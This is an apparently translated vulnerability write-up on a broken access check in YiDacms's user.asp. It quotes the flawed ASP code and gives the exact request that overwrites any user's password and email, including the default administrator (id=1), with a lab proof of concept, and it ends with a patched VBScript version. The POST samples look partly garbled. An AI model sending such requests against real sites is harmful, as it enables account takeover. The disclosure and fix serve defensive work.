YiDacms arbitrary user account reset vulnerability (including administrator)
YiDacms arbitrary user account reset vulnerability: not only the password
This is the first time I have seen a password reset problem like this: it is purely a horizontal (parallel) permission problem.
It is probably a programming mistake. The code that modifies user information does not check the attributes of the current user; it modifies whichever user record matches the id in the request. In addition, the user's email and password are submitted together with the rest of the information...
For this reason, a user's password can be changed directly just by modifying the information, and the password and email can be changed together. So there is no need to find an account first: it can simply be changed into the account you want!
Look at the code:
/Yidacms/user.asp file:
    If request("yidacms") = "system" Then
        set rs = server.createobject("adodb.recordset")
        ' The target row is chosen by the id request parameter
        user_id = cint(request("id"))
        sql = "select * from shuaiweb_user where id = " & user_id & ""
        rs.open sql, dbok, 1, 1
        ' Only checks that some user is logged in, not which user
        if session("shuaiweb_useremail") = "" then
            response.write "Please log on again!"
            response.end
        end if
        if Request.Form("shuaiweb_username") = "" then
            response.write "<script language=javascript>alert('name cannot be blank!');history.go(-1);</script>"
            response.end
        end if
        set rs = server.createobject("adodb.recordset")
        sql = "select * from shuaiweb_user where id = " & user_id & ""
        rs.open sql, dbok, 1, 3
        ' Email and password are overwritten together with the other fields
        rs("shuaiweb_useremail") = filter_Str(trim(request.form("shuaiweb_useremail")))
        rs("shuaiweb_userpass") = filter_Str(trim(request.form("shuaiweb_userpass")))
        rs("shuaiweb_username") = filter_Str(trim(request.form("shuaiweb_username")))
        rs("shuaiweb_usertel") = filter_Str(trim(request.form("shuaiweb_usertel")))
        rs("shuaiweb_userqq") = filter_Str(trim(request.form("shuaiweb_userqq")))
        rs("shuaiweb_usermsn") = filter_Str(trim(request.form("shuaiweb_usermsn")))
        rs("shuaiweb_useraddress") = filter_Str(trim(request.form("shuaiweb_useraddress")))
        rs("shuaiweb_userportrait") = filter_Str(trim(request.form("shuaiweb_userportrait")))
        rs("shuaiweb_usernote") = filter_Str(trim(request.form("shuaiweb_usernote")))
        rs("shuaiweb_usernumber") = filter_Str(trim(request.form("shuaiweb_usernumber")))
        rs.update
        rs.close
        set rs = nothing
        response.write "<script language=javascript>alert('modification successful!');location.replace('user_system.asp');parent.location.reload();</script>"
    End If
As you can see, the modification takes shuaiweb_useremail and shuaiweb_userpass directly from the submitted form.
There is no check of any kind.
The request for modifying user information is as follows:
Link: http://10.65.40.6/Yidacms/user.asp?yidacms=system&id=3
POST: response&shuaiweb_usernumber=222&response=13122222222&response=222222&response=222222%40222.com&shuaiweb_useraddress=222222&shuaiweb_usernote=222222&shuaiweb_useremail=222222%40222.com&response=Response&Submit=%CC%E1%BD%BB
id is the user id.
Changing the id here modifies the information of the user with that id, including the user name and password.
Now for the proof of the vulnerability.
First, look at the information of the user with id = 4, 222222@222.com:
The password here
Send the request:
http://10.65.40.6/Yidacms/user/user.asp?yidacms=system&id=4
response&shuaiweb_usernumber=222&response=13122222222&response=222222&response=222222%40222.com&shuaiweb_useraddress=222222&shuaiweb_usernote=222222&shuaiweb_useremail=222222%40222.com&response=Response&Submit=%CC%E1%BD%BB
Then look at the password of user 222222@222.com again:
The password has been modified.
The other information of ordinary users can be modified at will in the same way.
This vulnerability makes it possible to modify the account information of every user at once.
The admin has id = 1. This account already exists by default when the program is installed, so the administrator account can be modified directly.
Solution:
When user information is modified, check the attributes of the currently logged-in user.
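One way to implement that check in the user.asp branch shown above, as an added example that is not YiDacms's own code. It assumes that dbok and filter_Str come from the application as in the original, that login stores the account email in Session("shuaiweb_useremail"), and that emails are unique per account; the names re, is_owner and field_name are introduced here.

```vbscript
' Added example, not YiDacms code: update branch of user.asp with an ownership check.
' Assumptions: dbok (open ADODB connection) and filter_Str come from the application,
' login stores the account email in Session("shuaiweb_useremail"), emails are unique.
If Request("yidacms") = "system" Then
    If Session("shuaiweb_useremail") = "" Then
        Response.Write "Please log on again!"
        Response.End
    End If
    If Request.Form("shuaiweb_username") = "" Then
        Response.Write "<script language=javascript>alert('name cannot be blank!');history.go(-1);</script>"
        Response.End
    End If
    ' Accept only a plain decimal id, so the conversion below cannot raise an error.
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    If Not re.Test(Request("id") & "") Then
        Response.Status = "400 Bad Request"
        Response.End
    End If
    user_id = CLng(Request("id"))

    Set rs = Server.CreateObject("adodb.recordset")
    rs.Open "select * from shuaiweb_user where id = " & user_id, dbok, 1, 3
    ' The row must exist and belong to the logged-in user.
    is_owner = False
    If Not rs.EOF Then
        is_owner = (StrComp(rs("shuaiweb_useremail") & "", _
                            Session("shuaiweb_useremail") & "", vbTextCompare) = 0)
    End If
    If Not is_owner Then
        rs.Close
        Set rs = Nothing
        Response.Status = "403 Forbidden"
        Response.End
    End If

    ' shuaiweb_useremail is not updated here: the session identity is keyed on it.
    For Each field_name In Array("shuaiweb_userpass", "shuaiweb_username", _
            "shuaiweb_usertel", "shuaiweb_userqq", "shuaiweb_usermsn", _
            "shuaiweb_useraddress", "shuaiweb_userportrait", _
            "shuaiweb_usernote", "shuaiweb_usernumber")
        rs(field_name) = filter_Str(Trim(Request.Form(field_name)))
    Next
    rs.Update
    rs.Close
    Set rs = Nothing
    Response.Write "<script language=javascript>alert('modification successful!');" & _
        "location.replace('user_system.asp');parent.location.reload();</script>"
End If
```

With this check, a request whose id points at another user's row (including id = 1) is answered with 403 and nothing is written to the table.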